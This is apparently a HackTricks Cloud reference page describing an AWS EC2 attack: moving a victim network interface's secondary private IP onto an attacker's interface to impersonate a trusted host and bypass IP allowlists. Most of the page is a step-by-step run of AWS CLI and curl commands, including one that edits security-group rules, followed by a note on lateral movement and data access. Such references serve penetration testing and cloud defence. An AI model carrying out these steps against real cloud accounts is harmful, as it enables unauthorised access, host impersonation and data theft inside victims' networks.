🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
☁️ HackTricks Cloud / AWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)

AWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)

{{#include ../../../../banners/hacktricks-training.md}}

Abuse ec2:UnassignPrivateIpAddresses and ec2:AssignPrivateIpAddresses to steal a victim ENI’s secondary private IP and move it to an attacker ENI in the same subnet/AZ. Many internal services and security groups gate access by specific private IPs. By moving that secondary address, the attacker impersonates the trusted host at L3 and can reach allowlisted services.

Prereqs:
- Permissions: ec2:DescribeNetworkInterfaces, ec2:UnassignPrivateIpAddresses on the victim ENI ARN, and ec2:AssignPrivateIpAddresses on the attacker ENI ARN.
- Both ENIs must be in the same subnet/AZ. The target address must be a secondary IP (primary cannot be unassigned).

Variables:
- REGION=us-east-1
- VICTIM_ENI=
- ATTACKER_ENI=
- PROTECTED_SG= # SG on a target service that allows only $HIJACK_IP
- PROTECTED_HOST=

Steps:
1) Pick a secondary IP from the victim ENI

aws ec2 describe-network-interfaces --network-interface-ids $VICTIM_ENI --region $REGION   --query NetworkInterfaces[0].PrivateIpAddresses[?Primary==`false`].PrivateIpAddress --output text | head -n1 | tee HIJACK_IP
export HIJACK_IP=$(cat HIJACK_IP)

2) Ensure the protected host allows only that IP (idempotent). If using SG-to-SG rules instead, skip.

aws ec2 authorize-security-group-ingress --group-id $PROTECTED_SG --protocol tcp --port 80   --cidr "$HIJACK_IP/32" --region $REGION || true

3) Baseline: from attacker instance, request to PROTECTED_HOST should fail without spoofed source (e.g., over SSM/SSH)

curl -sS --max-time 3 http://$PROTECTED_HOST || true

4) Unassign the secondary IP from the victim ENI

aws ec2 unassign-private-ip-addresses --network-interface-id $VICTIM_ENI   --private-ip-addresses $HIJACK_IP --region $REGION

5) Assign the same IP to the attacker ENI (on AWS CLI v1 add --allow-reassignment)

aws ec2 assign-private-ip-addresses --network-interface-id $ATTACKER_ENI   --private-ip-addresses $HIJACK_IP --region $REGION

6) Verify ownership moved

aws ec2 describe-network-interfaces --network-interface-ids $ATTACKER_ENI --region $REGION   --query NetworkInterfaces[0].PrivateIpAddresses[].PrivateIpAddress --output text | grep -w $HIJACK_IP

7) From the attacker instance, source-bind to the hijacked IP to reach the protected host (ensure the IP is configured on the OS; if not, add it with ip addr add $HIJACK_IP/<mask> dev eth0)

curl --interface $HIJACK_IP -sS http://$PROTECTED_HOST -o /tmp/poc.out && head -c 80 /tmp/poc.out

Impact

  • Bypass IP allowlists and impersonate trusted hosts within the VPC by moving secondary private IPs between ENIs in the same subnet/AZ.
  • Reach internal services that gate access by specific source IPs, enabling lateral movement and data access.
    {{#include ../../../../banners/hacktricks-training.md}}